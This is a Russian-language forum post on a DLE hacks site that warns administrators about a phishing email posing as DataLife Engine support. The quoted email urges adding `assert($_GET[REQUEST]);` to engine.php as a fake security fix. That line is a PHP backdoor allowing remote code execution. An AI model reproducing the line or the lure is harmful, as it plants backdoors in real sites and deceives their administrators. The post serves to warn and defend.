|
|
|
||||||||
| DataLife Engine Скачать хаки для DLE, темы для DLE |
 |
|
|
Опции темы | Поиск в этой теме |
24.10.2014, 20:29
Вверх
|
#1 | |||
|
Коварный тип
  
|
Внимание!!! Развод админов на счет уязвимости /engine/engine.php
Сегодня получил письмо в котором сообщалось от имени официального сайта DLE о критической уязвимости. Вот только отправлено оно было с формы обратной связи. Если Вы получите данное письмо - знайте. Это попытка взлома Вашего сайта через банальный развод администратора.
------------------------------------------------ Текст сообщения ------------------------------------------------ Здравствуйте, уважаемый клиент! Благодарим Вас за использование на Вашем сайте rutut.com нашего ПО «CMS DataLife Engine - Система управления сайтами». Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных. По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников. Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: rutut.com/engine/engine.php и в самое начало файла после строчки: <?php добавьте: assert($_GET[REQUEST]); С уважением, Служба поддержки «DataLife Engine» IP адрес отправителя: 162.244.33.213 |
|||
|
||||
Сообщение от Serberg
